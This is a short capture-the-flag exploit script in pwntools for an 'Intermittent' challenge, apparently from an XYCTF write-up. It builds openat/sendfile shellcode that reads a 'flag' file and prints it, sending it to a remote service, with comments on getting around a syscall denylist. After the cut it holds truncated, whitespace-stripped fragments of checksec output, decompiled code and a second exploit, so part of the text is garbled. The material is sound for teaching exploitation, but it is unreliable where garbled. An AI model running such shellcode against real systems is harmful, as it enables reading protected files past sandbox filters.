from pwn import *

# Target is 64-bit Linux; shellcraft renders its templates for this context.
context(arch="amd64", os="linux")

# Local-run alternative kept from the original listing:
# p = process("./vuln")
p = remote("xxx.xx.xxx.x", 49443)
# Debugger hook kept from the original listing:
# gdb.attach(p,"b 0x1465")

# NOTE(review): using openat/sendfile instead of open/read/write suggests the
# target filters those syscalls; the filter is not visible in this excerpt, so
# confirm against the binary. On the defensive side, a syscall denylist that
# leaves equivalents like these reachable does not protect the file; an
# allowlist of the syscalls the program actually needs is the sturdier design.
shellcode = (
    # dirfd -100 is AT_FDCWD, so "flag" is resolved relative to the current
    # working directory; the flags argument is 0.
    shellcraft.openat(-100, "flag", 0)
    # out_fd 1 is stdout; in_fd 3 is the first file opened, i.e. the flag;
    # offset 0, count 50.
    + shellcraft.sendfile(1, 3, 0, 50)
)
# ... (the listing is cut off here on the page)
[*] '/home/gery5sa/桌面/pwn/xyctf/Intermittent/vuln' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled IDA打开 int __fastcall main(int argc, const char **argv, const char **envp) { unsigned __int64 i; // [rsp+0h] [rbp-120h] voi...
给出exp: frompwnimport*fromLibcSearcherimport*# from ae64 import AE64# from ctypes import cdllfilename='./vuln'context.arch='amd64'context.log_level='debug'# context.terminal = ['tmux', 'neww']local=1all_logs=[]elf=ELF(filename)libc=elf.libciflocal:sh=process(filename)else:sh=remo...